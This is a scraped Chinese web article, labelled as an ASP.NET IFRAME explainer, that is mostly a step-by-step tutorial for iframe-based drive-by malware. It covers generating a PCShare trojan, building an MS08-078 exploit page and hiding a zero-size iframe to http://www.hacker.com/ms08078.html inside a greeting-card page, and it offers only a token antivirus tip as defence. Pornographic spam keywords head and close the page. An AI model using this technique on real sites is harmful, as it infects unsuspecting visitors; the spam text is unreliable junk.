成人免费xxxxx在线视频软件_久久精品久久久_亚洲国产精品久久久_天天色天天色_亚洲人成一区_欧美一级欧美三级在线观看

了解什么是IFRAME ASP.NET

開發 后端
本文呢介紹了解什么是IFRAME ASP.NET,我們來邁出成長為安全工程師的第一步,掌握IFRAME框架掛馬的底細以及相應的防范方法。

安全工程師,要能獨立負責網站安全、局域網安全、服務器安全等,要了解網頁掛馬有IFRAME框架掛馬、JS文件掛馬、偽裝掛馬、CSS掛馬、ActiveX組件掛馬等方式,這樣才可以有針對性地進行防范,避免網站和服務器等安全威脅。下面,我們來邁出成長為安全工程師的第一步,掌握IFRAME框架掛馬的底細以及相應的防范方法。

什么是IFRAME框架掛馬

網頁掛馬到如今已經發展出許多方法與應用手段,其中IFRAME網頁框架掛馬是最典型的掛馬方式,也是最基本的掛馬方式,可以說沒有IFRAME,網頁木馬中有一多半就無法很好地隱藏,讓用戶在不察覺中受到攻擊。

什么是IFRAME?IFRAME是一個非常普通的HTML語言標記,它主要用來在一個網頁界面中,劃分出左右或者上下的框架,就如同我們電視機的畫中畫效果一樣。圖2中的山寨搜索引擎的界面就是典型的IFRAME的引用。

但是IFRAME功能也被黑客巧妙地利用了,黑客在一些看似正常的網頁中,使用長寬為0的隱藏框架,讓用戶在不知不覺中打開含有漏洞溢出內容的網頁木馬,這種手法就如同在畫中畫電視中打開了一個收費頻道,但是由于收費頻道的畫面尺寸被惡意修改成了0,所以看電視的人并不知道自己已經打開了收費頻道,雖然他并沒有看到,但是事實上收費頻道卻的確在播放,而且會收取用戶的使用費。

IFRAME框架掛馬實戰

下面我們來做個演示,看看IFRAME框架掛馬到底是怎么做的。

第一步:準備一款得心應手的木馬,例如PCShare,這款軟件在設置上非常簡單,易于操作上手。設置好相關服務,最后生成木馬所用的服務控制端。

第二步:使用FTP將木馬上傳到自己的網站空間中,并用記事本記錄下木馬的網絡路徑。然后再用《MS08-078網頁木馬生成器》,生成一個帶有MS08-078漏洞的惡意網頁。找一個正常的新年賀卡網頁,將該網頁保存到自己指定的目錄中,然后使用Web Designer或Dreamweaver網頁編輯軟件對保存的網頁進行調整修改,然后上傳到自己的網站空間中,看圖片等內容是否能夠正常顯示。

第三步:再一次打開修改好的賀卡網頁,使用IFRAME標記語句,將生成好的MS08-078網頁嵌入到賀卡網頁中,嵌入掛馬代碼如下:

  1. <iframe src=http://www.hacker.com/ms08078.html width=0 height=0>iframe> 

將這段代碼插入到賀卡網頁之中后,就完成了我們的網頁掛馬操作。瀏覽賀卡網頁的用戶,在看到賀卡頁面之后,也隨之運行了保存在指定位置“http://www.hacker.com/ms08078.html”的漏洞溢出頁面,但是由于它的長和寬都為“0”,觀看賀卡網站的用戶不會看到溢出頁面。

對于IFRAME標記這種利用正常HTML語言功能實現隱藏的掛馬方式,目前并沒有好的防范方法,因為它是正常的網頁功能。大家只能夠寄希望于殺毒軟件和防掛馬軟件阻止利用IFRAME標記內嵌的溢出病毒網頁。我們建議在安裝殺毒軟件之后,能夠安裝第三方防掛馬軟件作為補充,例如銳甲、360 等。以上介紹什么是IFRAME。

【編輯推薦】

  1. ASP.NET插件的實現方式
  2. 概述ASP.NET應用程序
  3. 淺談ASP.NET 2.0數據綁定
  4. ASP.NET阻止Java Script注入式攻擊
  5. ASP.NET MVC使用T4
責任編輯:佚名 來源: 網易空間
相關推薦

2009-08-03 14:22:33

什么是ASP.NET

2009-07-23 11:33:18

2009-07-21 17:46:47

ASP.NET表達式

2009-08-10 18:31:42

什么是ASP.NET

2009-08-24 16:46:58

什么是ASP.NET

2009-07-22 17:45:35

ASP.NET教程

2009-07-28 17:17:19

ASP.NET概述

2009-08-25 14:47:26

傳統ASP到ASP.N

2009-07-24 10:41:00

ASP.NET Web

2009-07-27 12:22:03

ASP.NET和ASPASP.NET入門教程

2009-07-29 17:11:25

ASP.NET ISA

2009-08-10 13:32:15

ASP.NET TimASP.NET組件設計

2009-07-29 16:08:07

ASP和ASP.NET

2009-08-07 17:31:26

ASP.NET Dat

2009-08-03 13:38:18

ASP.NET編程模型

2009-07-28 09:02:32

asp.net aja

2009-08-03 17:35:07

ASP.NET WebASP.NET編程工具

2009-05-13 09:08:47

ASP.NETLINQLINQ to SQL

2009-07-20 15:30:11

ASP.NET應用

2009-07-22 16:11:43

ASP.NET AJA
點贊
收藏

51CTO技術棧公眾號

主站蜘蛛池模板: 91看片官网| 黄色亚洲| 欧美成人精品 | 黄色毛片网站在线观看 | 日韩一区二区三区在线 | 盗摄精品av一区二区三区 | 一级黄片一级毛片 | 色久影院 | 精品国产乱码久久久久久蜜退臀 | 日韩精品一区二区三区在线观看 | 在线婷婷| 中文字幕精品一区久久久久 | 国产精品成人一区二区三区 | 羞羞视频网站免费看 | 日韩免费一区二区 | 欧美一区视频 | 日韩欧美一区二区三区四区 | 国产成人精品a视频 | 81精品国产乱码久久久久久 | 精品国产黄a∨片高清在线 成人区精品一区二区婷婷 日本一区二区视频 | 日韩av免费在线观看 | 欧美一区二区在线观看 | 中文字幕一区二区三区不卡 | 91亚洲国产 | 国产激情网 | 国产资源视频 | 欧美片网站免费 | 亚洲一区二区免费 | 欧美一级视频在线观看 | 亚洲第一av | 最新日韩在线 | 国产精品日韩一区 | 日日摸日日碰夜夜爽亚洲精品蜜乳 | 国产精品毛片一区二区在线看 | 欧美日韩精品 | 成人综合视频在线观看 | 中文字幕精品一区二区三区精品 | 欧美成年人 | 国产精品日日摸夜夜添夜夜av | 黄色国产大片 | 久久亚洲视频 |